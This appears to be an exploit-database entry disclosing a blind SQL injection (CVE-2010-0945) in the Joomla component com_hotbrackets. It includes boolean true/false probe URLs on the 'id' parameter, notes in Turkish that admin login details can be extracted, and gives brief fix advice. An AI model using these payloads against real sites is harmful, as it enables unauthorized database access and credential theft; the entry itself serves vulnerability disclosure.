Joomla! Component com_hotbrackets - Blind SQL Injection
Author: FL0RiX
type: webapps
platform: php
port:
date_added: 2010-01-02
date_updated:
verified: 0
codes: OSVDB-62825;CVE-2010-0945
tags:
aliases:
screenshot_url:
application_url:
<------------------- header data start ------------------- >
#############################################################
# Joomla Component com_hotbrackets Blind SQL injection Vulnerability
#############################################################
# author : Fl0riX
# Name : com_hotbrackets
# Bug Type : Blind SQL Injection
# Infection : Admin login bilgileri alınabilir.
# Demo Vuln. :
TRUE(+)
» http://server/index.php?option=com_hotbrackets&id=1 and 1=1
FALSE(-)
» http://server/index.php?option=com_hotbrackets&id=1 and 1=0
# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
path/index.php?option=com_hotbrackets&id=[Blind]
< -- bug code end of -- >